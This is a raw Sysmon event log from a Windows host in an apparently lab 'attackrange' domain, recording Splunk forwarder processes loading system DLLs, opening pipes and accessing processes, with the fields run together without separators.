734700x800000000000000057344185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057344179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057344176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x800000000000000057344171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.780{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.779{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:09.779{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.779{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:09.779{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.779{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:09.779{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.694{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.694{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=663816DC273EA87F243E1B2E84E429F7,SHA256=39C77917010B4178E1C2A2236FA8D1991F78EAB6309ED38CF88EE2E106DEE208falsetrue 534500x800000000000000057344160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.264{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.264{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057344158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.264{8B6011A9-5ACD-618E-33F3-04000000F101}89084624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.264{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.264{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057344155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.195{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.195{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E0198F8412F35DFEF9B289A6983F79E,SHA256=4BE4C5A3C74248FC6B79CC5F37C7A7CA2C7F08DEC08876320A9113A4C70670CCfalsetrue 734700x800000000000000057344153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.110{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 